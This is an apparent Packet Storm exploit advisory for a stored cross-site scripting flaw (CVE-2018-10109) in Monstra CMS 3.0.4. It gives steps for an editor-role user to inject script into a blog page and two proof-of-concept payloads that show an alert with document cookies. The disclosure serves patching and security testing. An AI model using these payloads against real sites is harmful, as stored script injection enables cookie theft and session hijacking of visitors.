Monstra CMS 3.0.4 Cross Site Scripting

2018-04-23T00:00:00
ID PACKETSTORM:147296
Type packetstorm
Reporter Wenming Jiang
Modified 2018-04-23T00:00:00

Description

                                        
                                            `# Exploit Title: Monstra cms 3.0.4 - Persitent Cross-Site Scripting  
# Date: 2018-04-14  
# Exploit Author: Wenming Jiang  
# Vendor Homepage: https://github.com/monstra-cms/monstra  
# Software Link: https://github.com/monstra-cms/monstra  
# Version: 3.0.4  
# Tested on: php 5.6, apache2.2.29, macos 10.12.6  
# CVE :CVE-2018-10109  
  
  
#Description:  
#Monstra CMS 3.0.4 has a stored XSS vulnerability when an attacker has access to the editor role, and enters the payload  
#in the content section of a new page in the blog catalog.  
  
  
#Steps to replicate:  
#1. log into the system as an editor role  
#2. creat a new page in the blog catalog  
#3. navigate to content section  
#4. enter payload: <script>alert(document.cookie)</script>  
#5. visit http://<your_site>/monstra/blog/<page_name>.php, you will triage JavaScript execution  
  
  
  
#Exploit Code:  
<script>alert(document.cookie)</script>  
or  
<img src=1 onerror=alert(/xss/) >  
  
`